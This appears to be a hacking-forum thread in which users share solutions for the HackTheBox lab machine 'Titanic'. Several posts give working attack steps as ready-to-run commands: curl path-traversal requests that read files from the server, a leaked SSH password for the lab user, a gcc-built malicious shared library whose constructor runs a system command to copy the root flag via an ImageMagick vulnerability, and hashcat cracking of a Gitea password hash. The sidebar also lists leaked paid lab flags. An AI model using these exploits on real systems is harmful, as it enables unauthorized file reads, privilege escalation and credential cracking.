Possibly Related Threads…

breached_idn · Feb 16, 2025, 01:06 AM

how did you know the location of gitea.db?

samuelballsiu1 · Feb 16, 2025, 01:24 AM

(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google

mt01 · Feb 16, 2025, 03:24 AM

I am still confused as to how we did the root thing

breached_idn · Feb 16, 2025, 03:46 AM

(Feb 16, 2025, 01:24 AM)samuelballsiu1 Wrote:
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google

sorry silly mistakes try to bruteforce dirsearch where the dev subdomain is certainly open

next question.. how to find any clue for priv esc? i'm running linpeas but not found interesting.

greenfire · Feb 16, 2025, 03:46 AM

(Feb 15, 2025, 07:17 PM)LostGem Wrote: user flag
curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"

curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: titanic.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://titanic.htb/' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' \
$'http://titanic.htb/download?ticket=/home/developer/user.txt'

Copied from burp. Directly point ticket=/home/developer/user.txt works.

vanatka123 · Feb 16, 2025, 05:10 AM

(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

read docker-compose.yml

marc4442 · Feb 16, 2025, 12:14 PM

(Feb 15, 2025, 07:58 PM)LostGem Wrote: userflag

curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"
ssh creds for developer
developer : 25282528

Root!

cd /opt/app/static/assets/images
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
system("cat /root/root.txt > /tmp/root.txt");
exit(0);
}
EOF

cp entertainment.jpg root.jpg

cat /tmp/root.txt

How did you find this vulnerability?

newacc0 · Feb 16, 2025, 12:50 PM

Quote:How did you find this vulnerability?

After finding that script, check magick version and google for vulns, read CVE description and you are ready to go

0x410x420x41 · Feb 16, 2025, 01:17 PM

So the script in /opt/scripts and the custom PATH for the developer user were only rabbit holes ?

Gattsu_berk_1421 · (This post was last modified: Feb 16, 2025, 04:39 PM by Gattsu_berk_1421.)

For me, hashcat doesnt like the format the hashes are in after gitea2hashcat.py script. What is the correct format for the hashes?

For anyone thats having similar issues:

cat developer_hash.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

hashcat -m 10900 --force developer_hash.txt /usr/share/wordlists/rockyou.txt

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	29	2,678	3 hours ago Last Post: newuser201
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	41	3,333	3 hours ago Last Post: newuser201
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	95	8,730	8 hours ago Last Post: zxACASD
	CBBH Write Ups	hiddenhacker	26	6,687	Yesterday, 08:45 AM Last Post: d39ug
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	606	94,629	Yesterday, 08:36 AM Last Post: Gotoschool